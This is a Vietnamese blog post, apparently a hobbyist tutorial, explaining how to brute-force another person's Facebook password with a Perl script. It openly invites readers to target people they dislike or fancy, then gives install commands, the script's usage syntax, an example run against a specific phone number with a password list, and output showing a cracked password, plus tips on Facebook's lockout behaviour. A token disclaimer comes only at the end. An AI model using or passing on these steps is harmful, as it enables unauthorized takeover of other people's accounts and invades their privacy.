Tấn công khai thác mật khẩu tài khoản facebook bằng phương pháp brute force

Tấn công khai thác mật khẩu tài khoản facebook bằng phương pháp brute force 

Một năm mới bình yên - Sơn


Tấn công khai thác mật khẩu tài khoản facebook bằng phương pháp brute force 

Có được mật khẩu facebook người khác (Nhất là người mình ghét hoặc người mình .😍. chả hạn) là điều vô cùng happy đúng không hừa ? . Có khá nhiều phương pháp khác nhau để lấy mật khẩu facebook người đó kể cả cách trực tiếp hay gián tiếp bao hàm cả tác động hay không tác động vào đối tượng và tác động hay không tác động vào phương tiện của đối tượng . Kể ra như : Phishing , Brute Force , KeyLogger , ... trong đó phương pháp Phishing và Brute Force đã và đang được trình bày tại IT Việt Nam và phương pháp Phishing cũng đã được tôi trinh bày cách viết code phishing đơn giản luôn ồi. Vậy thì bây giờ ta sẽ đi tìm hiểu phương pháp có tỷ lệ thành công thấp nhất. Thật nhé các cậu, thấp nhất. Brute Force .

Với cải tiến dạo gần đây của Facebook thì phương pháp sử dụng dưới đây có thể được xem như sắp tuyệt chủng rồi nhưng mà dù gì thì ta cũng đi tìm hiểu chút vậy.

Tấn công khai thác mật khẩu tài khoản facebook bằng phương pháp brute force 

Trước hết, để sử dụng công cụ này, ta cần đưa nó về máy ta đã. Các cậu có thể tải về tại đây :
Sau khi đã tải được công cụ này về rồi. Ừm thì các cậu có thấy đuôi .pl không ? . Đúng đấy, nó viết bằng perl nên tôi cũng chả thể kiểm được nó an toàn hay không. Nhưng thấy chả có gì đáng ngờ cả với lại khá nhiều nơi giới thiệu rồi nên chắc cũng an tâm. Mà máy cậu nào chưa cài perl thì chạy lệnh sau để cài perl (Mặc định thì linux nào cũng có perl sẵn, ngoại trừ):
sudo apt install perl 
Sau khi cài xong thì tiến hành đánh lệnh sau để khởi động công cụ (Chú ý là cd đến thư mục chứa cái file script mới down về nhé mấy cậu .
perl fb-brute.pl
Nếu các cậu gặp lỗi sau :
Can't locate Net/SSLeay/Handle.pm in @INC (you may need to install the Net::SSLeay::Handle module) (@INC contains: /etc/perl /usr/local/lib/i386-linux-gnu/perl/5.24.1 /usr/local/share/perl/5.24.1 /usr/lib/i386-linux-gnu/perl5/5.24 /usr/share/perl5 /usr/lib/i386-linux-gnu/perl/5.24 /usr/share/perl/5.24 /usr/local/lib/site_perl /usr/lib/i386-linux-gnu/perl-base) at fb-brute.pl line 41.
BEGIN failed--compilation aborted at fb-brute.pl line 41.
Thì nguyên nhân gây ra lỗi đó là tớ cũng chả biết cụ thể vì tớ không phải là perl dev nhưng thông qua tìm hiểu và mò code của nó cộng với cái lỗi nó báo thì nguyên nhân là do Socket ( Giống module Socket trong lập trình mạng Python ) nó thiếu module Net::SSLeay::Handle. Do đó các cậu cần cài nó bằng lệnh sau : 
sudo apt install libnet-ssleay-perl
hoặc 
sudo apt install libssl-dev
Còn mà không được nữ thì tớ chịu thôi . 😒 .


Cấu trúc chung để thực hiện cuộc tấn công bằng công cụ này như sau :
perl fb-brute.pl <tài_khoản> <đường_dẫn_file_pass>
Ví dụ , tôi sẽ brute tài khoản có số báo danh : 01647792622 với file pass là pass.txt được lưu tại cùng thư mục .
Thì tôi chạy như sau :
perl fb-brute.pl 01647792622 pass.txt
Và đây là kết quả : 
pi@raspberry:~/tools $ perl fb-brute.pl 01647792622 pass.txt

+++ Imad'Ox-Bruter Facebook password Bruter
+++ Coded by Imad'Ox-Hunter
+++ www.fb.com/imad.elouajib

[+] Now Cracking 01647792622 ...

[-] 123123123 -> Not Him :(
[-] 213213123 -> Not Him :(
[-] 123123123 -> Not Him :(
[-] 123123123 -> Not Him :(
[-] 123123123 -> Not Him :(
[-] 123213 -> Not Him :(

########################################################
[+] Yuuup!! Pass Cracked => Pass is xxxxxxxx :D
########################################################

Tấn công khai thác mật khẩu tài khoản facebook bằng phương pháp brute force 

Lưu ý là gì ?

1. Không phải tất cả tài khoản đều brute force được còn tùy thuộc vào file pass có chứa đứng 1 pass trong hàng vạn pass trong file đó không. Cấu hình bảo mật tài khoản như nào ( Ví dụ như có người sẽ bật thông báo nếu phát hiện đăng nhập bất thường ) và còn tùy thuộc vào cảm xúc của thèn Facebook lúc đó. Có trường hợp nó sẽ chặn nếu thất đăng nhập thất bại quá nhiều nhưng có lúc không.
2. Nếu pass có chứa kí tự đặc biệt thì khi bắt đúng pass nó sẽ ra kí tự mã hóa thay vì kí tự thông thường. Ví dụ # sẽ thành %23

Lưu ý cuối cùng : Đọc quy định trước khi làm bất cứ cài gì. Cấm sử dụng cho mục đích phá hoại

VIDEO 
[ Video này tớ lấy face của mẹ tớ. Nên sau khi test xong đã bảo mẹ ổi pass rồi. Hehe ]


OK ! DONE

[ " Đông kiếm em , mà răng em không gặp Đông ? " ]

Tấn công khai thác mật khẩu tài khoản facebook bằng phương pháp brute force Tấn công khai thác mật khẩu tài khoản facebook bằng phương pháp brute force Reviewed by Kane Pham on 4:02 AM Rating: 5

No comments:

Powered by Blogger.